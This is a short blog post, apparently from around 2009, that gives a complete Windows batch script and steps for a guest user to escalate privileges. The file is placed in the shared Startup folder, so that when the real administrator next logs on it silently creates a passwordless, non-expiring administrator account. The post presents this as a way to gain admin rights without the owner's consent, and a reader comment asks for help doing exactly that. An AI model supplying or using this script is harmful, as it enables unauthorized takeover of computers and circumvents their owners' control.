Using Guest Create An Admin Account
Step 1: Open up Notepad, copy and paste the following code into it and save the file as admin.bat. (You could actually give it any name, just make sure that the extension is .bat)
@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin
Step 2: Copy the file to the Startup folder. Here is the path to the Startup folder:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Step 3: There is no step 3.
The next time the admin logs on into the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using the username newadmin and without any password.
Remember that it wouldn’t take long for the real admin to find out that a new admin account has been created.
Popularity: 1%
Written by magakos. Read more great feeds at is source WEBSITE
1 comment.
Read more articles on Windows Hacks and Solutions and otherSoftware and Tips.
- [+] Digg: Feature this article
- [+] Del.icio.us: Bookmark this article
- [+] Furl: Bookmark this article
















#1. October 2nd, 2009, at 9:11 PM.
me quede en el paso 2 no entendi la 3era… :S nesesito desbloquiar el administrador y yo solo soy guest.. no puedo formatear mi lap por que hay mucha informazion importante… es windows vista…